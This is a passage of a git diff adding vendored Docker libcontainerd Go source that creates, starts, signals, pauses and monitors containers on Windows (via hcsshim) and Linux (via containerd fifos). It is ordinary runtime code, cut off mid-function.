+//	"MappedDirectories": [],
+//	"SandboxPath": "C:\\\\control\\\\windowsfilter",
+//	"HvPartition": true,
+//	"EndpointList": ["e1bb1e61-d56f-405e-b75d-fd520cefa0cb"],
+//	"HvRuntime": {
+//		"ImagePath": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c\\\\UtilityVM"
+//	},
+//	"Servicing": false
+//}
+func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	logrus.Debugln("libcontainerd: client.Create() with spec", spec)
+
+	configuration := &hcsshim.ContainerConfig{
+		SystemType: "Container",
+		Name:       containerID,
+		Owner:      defaultOwner,
+		IgnoreFlushesDuringBoot: false,
+		HostName:                spec.Hostname,
+		HvPartition:             false,
+	}
+
+	if spec.Windows.Resources != nil {
+		if spec.Windows.Resources.CPU != nil {
+			if spec.Windows.Resources.CPU.Count != nil {
+				// This check is being done here rather than in adaptContainerSettings
+				// because we don't want to update the HostConfig in case this container
+				// is moved to a host with more CPUs than this one.
+				cpuCount := *spec.Windows.Resources.CPU.Count
+				hostCPUCount := uint64(sysinfo.NumCPU())
+				if cpuCount > hostCPUCount {
+					logrus.Warnf("Changing requested CPUCount of %d to current number of processors, %d", cpuCount, hostCPUCount)
+					cpuCount = hostCPUCount
+				}
+				configuration.ProcessorCount = uint32(cpuCount)
+			}
+			if spec.Windows.Resources.CPU.Shares != nil {
+				configuration.ProcessorWeight = uint64(*spec.Windows.Resources.CPU.Shares)
+			}
+			if spec.Windows.Resources.CPU.Percent != nil {
+				configuration.ProcessorMaximum = int64(*spec.Windows.Resources.CPU.Percent) * 100 // ProcessorMaximum is a value between 1 and 10000
+			}
+		}
+		if spec.Windows.Resources.Memory != nil {
+			if spec.Windows.Resources.Memory.Limit != nil {
+				configuration.MemoryMaximumInMB = int64(*spec.Windows.Resources.Memory.Limit) / 1024 / 1024
+			}
+		}
+		if spec.Windows.Resources.Storage != nil {
+			if spec.Windows.Resources.Storage.Bps != nil {
+				configuration.StorageBandwidthMaximum = *spec.Windows.Resources.Storage.Bps
+			}
+			if spec.Windows.Resources.Storage.Iops != nil {
+				configuration.StorageIOPSMaximum = *spec.Windows.Resources.Storage.Iops
+			}
+		}
+	}
+
+	var layerOpt *LayerOption
+	for _, option := range options {
+		if s, ok := option.(*ServicingOption); ok {
+			configuration.Servicing = s.IsServicing
+			continue
+		}
+		if f, ok := option.(*FlushOption); ok {
+			configuration.IgnoreFlushesDuringBoot = f.IgnoreFlushesDuringBoot
+			continue
+		}
+		if h, ok := option.(*HyperVIsolationOption); ok {
+			configuration.HvPartition = h.IsHyperV
+			configuration.SandboxPath = h.SandboxPath
+			continue
+		}
+		if l, ok := option.(*LayerOption); ok {
+			layerOpt = l
+		}
+		if n, ok := option.(*NetworkEndpointsOption); ok {
+			configuration.EndpointList = n.Endpoints
+			configuration.AllowUnqualifiedDNSQuery = n.AllowUnqualifiedDNSQuery
+			continue
+		}
+		if c, ok := option.(*CredentialsOption); ok {
+			configuration.Credentials = c.Credentials
+			continue
+		}
+	}
+
+	// We must have a layer option with at least one path
+	if layerOpt == nil || layerOpt.LayerPaths == nil {
+		return fmt.Errorf("no layer option or paths were supplied to the runtime")
+	}
+
+	if configuration.HvPartition {
+		// Find the upper-most utility VM image, since the utility VM does not
+		// use layering in RS1.
+		// TODO @swernli/jhowardmsft at some point post RS1 this may be re-locatable.
+		var uvmImagePath string
+		for _, path := range layerOpt.LayerPaths {
+			fullPath := filepath.Join(path, "UtilityVM")
+			_, err := os.Stat(fullPath)
+			if err == nil {
+				uvmImagePath = fullPath
+				break
+			}
+			if !os.IsNotExist(err) {
+				return err
+			}
+		}
+		if uvmImagePath == "" {
+			return errors.New("utility VM image could not be found")
+		}
+		configuration.HvRuntime = &hcsshim.HvRuntime{ImagePath: uvmImagePath}
+	} else {
+		configuration.VolumePath = spec.Root.Path
+	}
+
+	configuration.LayerFolderPath = layerOpt.LayerFolderPath
+
+	for _, layerPath := range layerOpt.LayerPaths {
+		_, filename := filepath.Split(layerPath)
+		g, err := hcsshim.NameToGuid(filename)
+		if err != nil {
+			return err
+		}
+		configuration.Layers = append(configuration.Layers, hcsshim.Layer{
+			ID:   g.ToString(),
+			Path: layerPath,
+		})
+	}
+
+	// Add the mounts (volumes, bind mounts etc) to the structure
+	mds := make([]hcsshim.MappedDir, len(spec.Mounts))
+	for i, mount := range spec.Mounts {
+		mds[i] = hcsshim.MappedDir{
+			HostPath:      mount.Source,
+			ContainerPath: mount.Destination,
+			ReadOnly:      false,
+		}
+		for _, o := range mount.Options {
+			if strings.ToLower(o) == "ro" {
+				mds[i].ReadOnly = true
+			}
+		}
+	}
+	configuration.MappedDirectories = mds
+
+	hcsContainer, err := hcsshim.CreateContainer(containerID, configuration)
+	if err != nil {
+		return err
+	}
+
+	// Construct a container object for calling start on it.
+	container := &container{
+		containerCommon: containerCommon{
+			process: process{
+				processCommon: processCommon{
+					containerID:  containerID,
+					client:       clnt,
+					friendlyName: InitFriendlyName,
+				},
+				commandLine: strings.Join(spec.Process.Args, " "),
+			},
+			processes: make(map[string]*process),
+		},
+		ociSpec:      spec,
+		hcsContainer: hcsContainer,
+	}
+
+	container.options = options
+	for _, option := range options {
+		if err := option.Apply(container); err != nil {
+			logrus.Errorf("libcontainerd: %v", err)
+		}
+	}
+
+	// Call start, and if it fails, delete the container from our
+	// internal structure, start will keep HCS in sync by deleting the
+	// container there.
+	logrus.Debugf("libcontainerd: Create() id=%s, Calling start()", containerID)
+	if err := container.start(attachStdio); err != nil {
+		clnt.deleteContainer(containerID)
+		return err
+	}
+
+	logrus.Debugf("libcontainerd: Create() id=%s completed successfully", containerID)
+	return nil
+
+}
+
+// AddProcess is the handler for adding a process to an already running
+// container. It's called through docker exec. It returns the system pid of the
+// exec'd process.
+func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, procToAdd Process, attachStdio StdioCallback) (int, error) {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	container, err := clnt.getContainer(containerID)
+	if err != nil {
+		return -1, err
+	}
+	// Note we always tell HCS to
+	// create stdout as it's required regardless of '-i' or '-t' options, so that
+	// docker can always grab the output through logs. We also tell HCS to always
+	// create stdin, even if it's not used - it will be closed shortly. Stderr
+	// is only created if it we're not -t.
+	createProcessParms := hcsshim.ProcessConfig{
+		EmulateConsole:   procToAdd.Terminal,
+		CreateStdInPipe:  true,
+		CreateStdOutPipe: true,
+		CreateStdErrPipe: !procToAdd.Terminal,
+	}
+	createProcessParms.ConsoleSize[0] = uint(procToAdd.ConsoleSize.Height)
+	createProcessParms.ConsoleSize[1] = uint(procToAdd.ConsoleSize.Width)
+
+	// Take working directory from the process to add if it is defined,
+	// otherwise take from the first process.
+	if procToAdd.Cwd != "" {
+		createProcessParms.WorkingDirectory = procToAdd.Cwd
+	} else {
+		createProcessParms.WorkingDirectory = container.ociSpec.Process.Cwd
+	}
+
+	// Configure the environment for the process
+	createProcessParms.Environment = setupEnvironmentVariables(procToAdd.Env)
+	createProcessParms.CommandLine = strings.Join(procToAdd.Args, " ")
+	createProcessParms.User = procToAdd.User.Username
+
+	logrus.Debugf("libcontainerd: commandLine: %s", createProcessParms.CommandLine)
+
+	// Start the command running in the container.
+	var stdout, stderr io.ReadCloser
+	var stdin io.WriteCloser
+	newProcess, err := container.hcsContainer.CreateProcess(&createProcessParms)
+	if err != nil {
+		logrus.Errorf("libcontainerd: AddProcess(%s) CreateProcess() failed %s", containerID, err)
+		return -1, err
+	}
+
+	pid := newProcess.Pid()
+
+	stdin, stdout, stderr, err = newProcess.Stdio()
+	if err != nil {
+		logrus.Errorf("libcontainerd: %s getting std pipes failed %s", containerID, err)
+		return -1, err
+	}
+
+	iopipe := &IOPipe{Terminal: procToAdd.Terminal}
+	iopipe.Stdin = createStdInCloser(stdin, newProcess)
+
+	// Convert io.ReadClosers to io.Readers
+	if stdout != nil {
+		iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout})
+	}
+	if stderr != nil {
+		iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr})
+	}
+
+	proc := &process{
+		processCommon: processCommon{
+			containerID:  containerID,
+			friendlyName: processFriendlyName,
+			client:       clnt,
+			systemPid:    uint32(pid),
+		},
+		commandLine: createProcessParms.CommandLine,
+		hcsProcess:  newProcess,
+	}
+
+	// Add the process to the container's list of processes
+	container.processes[processFriendlyName] = proc
+
+	// Tell the engine to attach streams back to the client
+	if err := attachStdio(*iopipe); err != nil {
+		return -1, err
+	}
+
+	// Spin up a go routine waiting for exit to handle cleanup
+	go container.waitExit(proc, false)
+
+	return pid, nil
+}
+
+// Signal handles `docker stop` on Windows. While Linux has support for
+// the full range of signals, signals aren't really implemented on Windows.
+// We fake supporting regular stop and -9 to force kill.
+func (clnt *client) Signal(containerID string, sig int) error {
+	var (
+		cont *container
+		err  error
+	)
+
+	// Get the container as we need it to get the container handle.
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	if cont, err = clnt.getContainer(containerID); err != nil {
+		return err
+	}
+
+	cont.manualStopRequested = true
+
+	logrus.Debugf("libcontainerd: Signal() containerID=%s sig=%d pid=%d", containerID, sig, cont.systemPid)
+
+	if syscall.Signal(sig) == syscall.SIGKILL {
+		// Terminate the compute system
+		if err := cont.hcsContainer.Terminate(); err != nil {
+			if !hcsshim.IsPending(err) {
+				logrus.Errorf("libcontainerd: failed to terminate %s - %q", containerID, err)
+			}
+		}
+	} else {
+		// Terminate Process
+		if err := cont.hcsProcess.Kill(); err != nil && !hcsshim.IsAlreadyStopped(err) {
+			// ignore errors
+			logrus.Warnf("libcontainerd: failed to terminate pid %d in %s: %q", cont.systemPid, containerID, err)
+		}
+	}
+
+	return nil
+}
+
+// While Linux has support for the full range of signals, signals aren't really implemented on Windows.
+// We try to terminate the specified process whatever signal is requested.
+func (clnt *client) SignalProcess(containerID string, processFriendlyName string, sig int) error {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	cont, err := clnt.getContainer(containerID)
+	if err != nil {
+		return err
+	}
+
+	for _, p := range cont.processes {
+		if p.friendlyName == processFriendlyName {
+			return p.hcsProcess.Kill()
+		}
+	}
+
+	return fmt.Errorf("SignalProcess could not find process %s in %s", processFriendlyName, containerID)
+}
+
+// Resize handles a CLI event to resize an interactive docker run or docker exec
+// window.
+func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error {
+	// Get the libcontainerd container object
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	cont, err := clnt.getContainer(containerID)
+	if err != nil {
+		return err
+	}
+
+	h, w := uint16(height), uint16(width)
+
+	if processFriendlyName == InitFriendlyName {
+		logrus.Debugln("libcontainerd: resizing systemPID in", containerID, cont.process.systemPid)
+		return cont.process.hcsProcess.ResizeConsole(w, h)
+	}
+
+	for _, p := range cont.processes {
+		if p.friendlyName == processFriendlyName {
+			logrus.Debugln("libcontainerd: resizing exec'd process", containerID, p.systemPid)
+			return p.hcsProcess.ResizeConsole(w, h)
+		}
+	}
+
+	return fmt.Errorf("Resize could not find containerID %s to resize", containerID)
+
+}
+
+// Pause handles pause requests for containers
+func (clnt *client) Pause(containerID string) error {
+	unlockContainer := true
+	// Get the libcontainerd container object
+	clnt.lock(containerID)
+	defer func() {
+		if unlockContainer {
+			clnt.unlock(containerID)
+		}
+	}()
+	container, err := clnt.getContainer(containerID)
+	if err != nil {
+		return err
+	}
+
+	for _, option := range container.options {
+		if h, ok := option.(*HyperVIsolationOption); ok {
+			if !h.IsHyperV {
+				return errors.New("cannot pause Windows Server Containers")
+			}
+			break
+		}
+	}
+
+	err = container.hcsContainer.Pause()
+	if err != nil {
+		return err
+	}
+
+	// Unlock container before calling back into the daemon
+	unlockContainer = false
+	clnt.unlock(containerID)
+
+	return clnt.backend.StateChanged(containerID, StateInfo{
+		CommonStateInfo: CommonStateInfo{
+			State: StatePause,
+		}})
+}
+
+// Resume handles resume requests for containers
+func (clnt *client) Resume(containerID string) error {
+	unlockContainer := true
+	// Get the libcontainerd container object
+	clnt.lock(containerID)
+	defer func() {
+		if unlockContainer {
+			clnt.unlock(containerID)
+		}
+	}()
+	container, err := clnt.getContainer(containerID)
+	if err != nil {
+		return err
+	}
+
+	// This should never happen, since Windows Server Containers cannot be paused
+	for _, option := range container.options {
+		if h, ok := option.(*HyperVIsolationOption); ok {
+			if !h.IsHyperV {
+				return errors.New("cannot resume Windows Server Containers")
+			}
+			break
+		}
+	}
+
+	err = container.hcsContainer.Resume()
+	if err != nil {
+		return err
+	}
+
+	// Unlock container before calling back into the daemon
+	unlockContainer = false
+	clnt.unlock(containerID)
+
+	return clnt.backend.StateChanged(containerID, StateInfo{
+		CommonStateInfo: CommonStateInfo{
+			State: StateResume,
+		}})
+}
+
+// Stats handles stats requests for containers
+func (clnt *client) Stats(containerID string) (*Stats, error) {
+	// Get the libcontainerd container object
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	container, err := clnt.getContainer(containerID)
+	if err != nil {
+		return nil, err
+	}
+	s, err := container.hcsContainer.Statistics()
+	if err != nil {
+		return nil, err
+	}
+	st := Stats(s)
+	return &st, nil
+}
+
+// Restore is the handler for restoring a container
+func (clnt *client) Restore(containerID string, _ StdioCallback, unusedOnWindows ...CreateOption) error {
+	// TODO Windows: Implement this. For now, just tell the backend the container exited.
+	logrus.Debugf("libcontainerd: Restore(%s)", containerID)
+	return clnt.backend.StateChanged(containerID, StateInfo{
+		CommonStateInfo: CommonStateInfo{
+			State:    StateExit,
+			ExitCode: 1 << 31,
+		}})
+}
+
+// GetPidsForContainer returns a list of process IDs running in a container.
+// Although implemented, this is not used in Windows.
+func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) {
+	var pids []int
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	cont, err := clnt.getContainer(containerID)
+	if err != nil {
+		return nil, err
+	}
+
+	// Add the first process
+	pids = append(pids, int(cont.containerCommon.systemPid))
+	// And add all the exec'd processes
+	for _, p := range cont.processes {
+		pids = append(pids, int(p.processCommon.systemPid))
+	}
+	return pids, nil
+}
+
+// Summary returns a summary of the processes running in a container.
+// This is present in Windows to support docker top. In linux, the
+// engine shells out to ps to get process information. On Windows, as
+// the containers could be Hyper-V containers, they would not be
+// visible on the container host. However, libcontainerd does have
+// that information.
+func (clnt *client) Summary(containerID string) ([]Summary, error) {
+
+	// Get the libcontainerd container object
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	container, err := clnt.getContainer(containerID)
+	if err != nil {
+		return nil, err
+	}
+	p, err := container.hcsContainer.ProcessList()
+	if err != nil {
+		return nil, err
+	}
+	pl := make([]Summary, len(p))
+	for i := range p {
+		pl[i] = Summary(p[i])
+	}
+	return pl, nil
+}
+
+// UpdateResources updates resources for a running container.
+func (clnt *client) UpdateResources(containerID string, resources Resources) error {
+	// Updating resource isn't supported on Windows
+	// but we should return nil for enabling updating container
+	return nil
+}
+
+func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error {
+	return errors.New("Windows: Containers do not support checkpoints")
+}
+
+func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error {
+	return errors.New("Windows: Containers do not support checkpoints")
+}
+
+func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) {
+	return nil, errors.New("Windows: Containers do not support checkpoints")
+}
+
+func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) {
+	return &ServerVersion{}, nil
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/container.go b/vendor/github.com/docker/docker/libcontainerd/container.go
new file mode 100644
index 0000000000..b40321389a
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/container.go
@@ -0,0 +1,13 @@
+package libcontainerd
+
+const (
+	// InitFriendlyName is the name given in the lookup map of processes
+	// for the first process started in a container.
+	InitFriendlyName = "init"
+	configFilename   = "config.json"
+)
+
+type containerCommon struct {
+	process
+	processes map[string]*process
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/container_unix.go b/vendor/github.com/docker/docker/libcontainerd/container_unix.go
new file mode 100644
index 0000000000..61bab145f2
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/container_unix.go
@@ -0,0 +1,250 @@
+// +build linux solaris
+
+package libcontainerd
+
+import (
+	"encoding/json"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/docker/docker/pkg/ioutils"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/tonistiigi/fifo"
+	"golang.org/x/net/context"
+)
+
+type container struct {
+	containerCommon
+
+	// Platform specific fields are below here.
+	pauseMonitor
+	oom         bool
+	runtime     string
+	runtimeArgs []string
+}
+
+type runtime struct {
+	path string
+	args []string
+}
+
+// WithRuntime sets the runtime to be used for the created container
+func WithRuntime(path string, args []string) CreateOption {
+	return runtime{path, args}
+}
+
+func (rt runtime) Apply(p interface{}) error {
+	if pr, ok := p.(*container); ok {
+		pr.runtime = rt.path
+		pr.runtimeArgs = rt.args
+	}
+	return nil
+}
+
+func (ctr *container) clean() error {
+	if os.Getenv("LIBCONTAINERD_NOCLEAN") == "1" {
+		return nil
+	}
+	if _, err := os.Lstat(ctr.dir); err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	}
+
+	if err := os.RemoveAll(ctr.dir); err != nil {
+		return err
+	}
+	return nil
+}
+
+// cleanProcess removes the fifos used by an additional process.
+// Caller needs to lock container ID before calling this method.
+func (ctr *container) cleanProcess(id string) {
+	if p, ok := ctr.processes[id]; ok {
+		for _, i := range []int{syscall.Stdin, syscall.Stdout, syscall.Stderr} {
+			if err := os.Remove(p.fifo(i)); err != nil && !os.IsNotExist(err) {
+				logrus.Warnf("libcontainerd: failed to remove %v for process %v: %v", p.fifo(i), id, err)
+			}
+		}
+	}
+	delete(ctr.processes, id)
+}
+
+func (ctr *container) spec() (*specs.Spec, error) {
+	var spec specs.Spec
+	dt, err := ioutil.ReadFile(filepath.Join(ctr.dir, configFilename))
+	if err != nil {
+		return nil, err
+	}
+	if err := json.Unmarshal(dt, &spec); err != nil {
+		return nil, err
+	}
+	return &spec, nil
+}
+
+func (ctr *container) start(checkpoint string, checkpointDir string, attachStdio StdioCallback) (err error) {
+	spec, err := ctr.spec()
+	if err != nil {
+		return nil
+	}
+
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	ready := make(chan struct{})
+
+	fifoCtx, cancel := context.WithCancel(context.Background())
+	defer func() {
+		if err != nil {
+			cancel()
+		}
+	}()
+
+	iopipe, err := ctr.openFifos(fifoCtx, spec.Process.Terminal)
+	if err != nil {
+		return err
+	}
+
+	var stdinOnce sync.Once
+
+	// we need to delay stdin closure after container start or else "stdin close"
+	// event will be rejected by containerd.
+	// stdin closure happens in attachStdio
+	stdin := iopipe.Stdin
+	iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error {
+		var err error
+		stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed
+			err = stdin.Close()
+			go func() {
+				select {
+				case <-ready:
+				case <-ctx.Done():
+				}
+				select {
+				case <-ready:
+					if err := ctr.sendCloseStdin(); err != nil {
+						logrus.Warnf("failed to close stdin: %+v", err)
+					}
+				default:
+				}
+			}()
+		})
+		return err
+	})
+
+	r := &containerd.CreateContainerRequest{
+		Id:            ctr.containerID,
+		BundlePath:    ctr.dir,
+		Stdin:         ctr.fifo(syscall.Stdin),
+		Stdout:        ctr.fifo(syscall.Stdout),
+		Stderr:        ctr.fifo(syscall.Stderr),
+		Checkpoint:    checkpoint,
+		CheckpointDir: checkpointDir,
+		// check to see if we are running in ramdisk to disable pivot root
+		NoPivotRoot: os.Getenv("DOCKER_RAMDISK") != "",
+		Runtime:     ctr.runtime,
+		RuntimeArgs: ctr.runtimeArgs,
+	}
+	ctr.client.appendContainer(ctr)
+
+	if err := attachStdio(*iopipe); err != nil {
+		ctr.closeFifos(iopipe)
+		return err
+	}
+
+	resp, err := ctr.client.remote.apiClient.CreateContainer(context.Background(), r)
+	if err != nil {
+		ctr.closeFifos(iopipe)
+		return err
+	}
+	ctr.systemPid = systemPid(resp.Container)
+	close(ready)
+
+	return ctr.client.backend.StateChanged(ctr.containerID, StateInfo{
+		CommonStateInfo: CommonStateInfo{
+			State: StateStart,
+			Pid:   ctr.systemPid,
+		}})
+}
+
+func (ctr *container) newProcess(friendlyName string) *process {
+	return &process{
+		dir: ctr.dir,
+		processCommon: processCommon{
+			containerID:  ctr.containerID,
+			friendlyName: friendlyName,
+			client:       ctr.client,
+		},
+	}
+}
+
+func (ctr *container) handleEvent(e *containerd.Event) error {
+	ctr.client.lock(ctr.containerID)
+	defer ctr.client.unlock(ctr.containerID)
+	switch e.Type {
+	case StateExit, StatePause, StateResume, StateOOM:
+		st := StateInfo{
+			CommonStateInfo: CommonStateInfo{
+				State:    e.Type,
+				ExitCode: e.Status,
+			},
+			OOMKilled: e.Type == StateExit && ctr.oom,
+		}
+		if e.Type == StateOOM {
+			ctr.oom = true
+		}
+		if e.Type == StateExit && e.Pid != InitFriendlyName {
+			st.ProcessID = e.Pid
+			st.State = StateExitProcess
+		}
+
+		// Remove process from list if we have exited
+		switch st.State {
+		case StateExit:
+			ctr.clean()
+			ctr.client.deleteContainer(e.Id)
+		case StateExitProcess:
+			ctr.cleanProcess(st.ProcessID)
+		}
+		ctr.client.q.append(e.Id, func() {
+			if err := ctr.client.backend.StateChanged(e.Id, st); err != nil {
+				logrus.Errorf("libcontainerd: backend.StateChanged(): %v", err)
+			}
+			if e.Type == StatePause || e.Type == StateResume {
+				ctr.pauseMonitor.handle(e.Type)
+			}
+			if e.Type == StateExit {
+				if en := ctr.client.getExitNotifier(e.Id); en != nil {
+					en.close()
+				}
+			}
+		})
+
+	default:
+		logrus.Debugf("libcontainerd: event unhandled: %+v", e)
+	}
+	return nil
+}
+
+// discardFifos attempts to fully read the container fifos to unblock processes
+// that may be blocked on the writer side.
+func (ctr *container) discardFifos() {
+	ctx, _ := context.WithTimeout(context.Background(), 3*time.Second)
+	for _, i := range []int{syscall.Stdout, syscall.Stderr} {
+		f, err := fifo.OpenFifo(ctx, ctr.fifo(i), syscall.O_RDONLY|syscall.O_NONBLOCK, 0)
+		if err != nil {
+			logrus.Warnf("error opening fifo %v for discarding: %+v", f, err)
+			continue
+		}
+		go func() {
+			io.Copy(ioutil.Discard, f)
+		}()
+	}
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/container_windows.go b/vendor/github.com/docker/docker/libcontainerd/container_windows.go
new file mode 100644
index 0000000000..9b1965099a
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/container_windows.go
@@ -0,0 +1,311 @@
+package libcontainerd
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+	"strings"
+	"syscall"
+	"time"
+
+	"github.com/Microsoft/hcsshim"
+	"github.com/Sirupsen/logrus"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+type container struct {
+	containerCommon
+
+	// Platform specific fields are below here. There are none presently on Windows.
+	options []CreateOption
+
+	// The ociSpec is required, as client.Create() needs a spec,
+	// but can be called from the RestartManager context which does not
+	// otherwise have access to the Spec
+	ociSpec specs.Spec
+
+	manualStopRequested bool
+	hcsContainer        hcsshim.Container
+}
+
+func (ctr *container) newProcess(friendlyName string) *process {
+	return &process{
+		processCommon: processCommon{
+			containerID:  ctr.containerID,
+			friendlyName: friendlyName,
+			client:       ctr.client,
+		},
+	}
+}
+
+// start starts a created container.
+// Caller needs to lock container ID before calling this method.
+func (ctr *container) start(attachStdio StdioCallback) error {
+	var err error
+	isServicing := false
+
+	for _, option := range ctr.options {
+		if s, ok := option.(*ServicingOption); ok && s.IsServicing {
+			isServicing = true
+		}
+	}
+
+	// Start the container.  If this is a servicing container, this call will block
+	// until the container is done with the servicing execution.
+	logrus.Debugln("libcontainerd: starting container ", ctr.containerID)
+	if err = ctr.hcsContainer.Start(); err != nil {
+		logrus.Errorf("libcontainerd: failed to start container: %s", err)
+		if err := ctr.terminate(); err != nil {
+			logrus.Errorf("libcontainerd: failed to cleanup after a failed Start. %s", err)
+		} else {
+			logrus.Debugln("libcontainerd: cleaned up after failed Start by calling Terminate")
+		}
+		return err
+	}
+
+	// Note we always tell HCS to
+	// create stdout as it's required regardless of '-i' or '-t' options, so that
+	// docker can always grab the output through logs. We also tell HCS to always
+	// create stdin, even if it's not used - it will be closed shortly. Stderr
+	// is only created if it we're not -t.
+	createProcessParms := &hcsshim.ProcessConfig{
+		EmulateConsole:   ctr.ociSpec.Process.Terminal,
+		WorkingDirectory: ctr.ociSpec.Process.Cwd,
+		CreateStdInPipe:  !isServicing,
+		CreateStdOutPipe: !isServicing,
+		CreateStdErrPipe: !ctr.ociSpec.Process.Terminal && !isServicing,
+	}
+	createProcessParms.ConsoleSize[0] = uint(ctr.ociSpec.Process.ConsoleSize.Height)
+	createProcessParms.ConsoleSize[1] = uint(ctr.ociSpec.Process.ConsoleSize.Width)
+
+	// Configure the environment for the process
+	createProcessParms.Environment = setupEnvironmentVariables(ctr.ociSpec.Process.Env)
+	createProcessParms.CommandLine = strings.Join(ctr.ociSpec.Process.Args, " ")
+	createProcessParms.User = ctr.ociSpec.Process.User.Username
+
+	// Start the command running in the container.
+	newProcess, err := ctr.hcsContainer.CreateProcess(createProcessParms)
+	if err != nil {
+		logrus.Errorf("libcontainerd: CreateProcess() failed %s", err)
+		if err := ctr.terminate(); err != nil {
+			logrus.Errorf("libcontainerd: failed to cleanup after a failed CreateProcess. %s", err)
+		} else {
+			logrus.Debugln("libcontainerd: cleaned up after failed CreateProcess by calling Terminate")
+		}
+		return err
+	}
+
+	pid := newProcess.Pid()
+
+	// Save the hcs Process and PID
+	ctr.process.friendlyName = InitFriendlyName
+	ctr.process.hcsProcess = newProcess
+
+	// If this is a servicing container, wait on the process synchronously here and
+	// if it succeeds, wait for it cleanly shutdown and merge into the parent container.
+	if isServicing {
+		exitCode := ctr.waitProcessExitCode(&ctr.process)
+
+		if exitCode != 0 {
+			if err := ctr.terminate(); err != nil {
+				logrus.Warnf("libcontainerd: terminating servicing container %s failed: %s", ctr.containerID, err)
+			}
+			return fmt.Errorf("libcontainerd: servicing container %s returned non-zero exit code %d", ctr.containerID, exitCode)
+		}
+
+		return ctr.hcsContainer.WaitTimeout(time.Minute * 5)
+	}
+
+	var stdout, stderr io.ReadCloser
+	var stdin io.WriteCloser
+	stdin, stdout, stderr, err = newProcess.Stdio()
+	if err != nil {
+		logrus.Errorf("libcontainerd: failed to get stdio pipes: %s", err)
+		if err := ctr.terminate(); err != nil {
+			logrus.Errorf("libcontainerd: failed to cleanup after a failed Stdio. %s", err)
+		}
+		return err
+	}
+
+	iopipe := &IOPipe{Terminal: ctr.ociSpec.Process.Terminal}
+
+	iopipe.Stdin = createStdInCloser(stdin, newProcess)
+
+	// Convert io.ReadClosers to io.Readers
+	if stdout != nil {
+		iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout})
+	}
+	if stderr != nil {
+		iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr})
+	}
+
+	// Save the PID
+	logrus.Debugf("libcontainerd: process started - PID %d", pid)
+	ctr.systemPid = uint32(pid)
+
+	// Spin up a go routine waiting for exit to handle cleanup
+	go ctr.waitExit(&ctr.process, true)
+
+	ctr.client.appendContainer(ctr)
+
+	if err := attachStdio(*iopipe); err != nil {
+		// OK to return the error here, as waitExit will handle tear-down in HCS
+		return err
+	}
+
+	// Tell the docker engine that the container has started.
+	si := StateInfo{
+		CommonStateInfo: CommonStateInfo{
+			State: StateStart,
+			Pid:   ctr.systemPid, // Not sure this is needed? Double-check monitor.go in daemon BUGBUG @jhowardmsft
+		}}
+	logrus.Debugf("libcontainerd: start() completed OK, %+v", si)
+	return ctr.client.backend.StateChanged(ctr.containerID, si)
+
+}
+
+// waitProcessExitCode will wait for the given process to exit and return its error code.
+func (ctr *container) waitProcessExitCode(process *process) int {
+	// Block indefinitely for the process to exit.
+	err := process.hcsProcess.Wait()
+	if err != nil {
+		if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE {
+			logrus.Warnf("libcontainerd: Wait() failed (container may have been killed): %s", err)
+		}
+		// Fall through here, do not return. This ensures we attempt to continue the
+		// shutdown in HCS and tell the docker engine that the process/container
+		// has exited to avoid a container being dropped on the floor.
+	}
+
+	exitCode, err := process.hcsProcess.ExitCode()
+	if err != nil {
+		if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE {
+			logrus.Warnf("libcontainerd: unable to get exit code from container %s", ctr.containerID)
+		}
+		// Since we got an error retrieving the exit code, make sure that the code we return
+		// doesn't incorrectly indicate success.
+		exitCode = -1
+
+		// Fall through here, do not return. This ensures we attempt to continue the
+		// shutdown in HCS and tell the docker engine that the process/container
+		// has exited to avoid a container being dropped on the floor.
+	}
+
+	return exitCode
+}
+
+// waitExit runs as a goroutine waiting for the process to exit. It's
+// equivalent to (in the linux containerd world) where events come in for
+// state change notifications from containerd.
+func (ctr *container) waitExit(process *process, isFirstProcessToStart bool) error {
+	logrus.Debugln("libcontainerd: waitExit() on pid", process.systemPid)
+
+	exitCode := ctr.waitProcessExitCode(process)
+	// Lock the container while shutting down
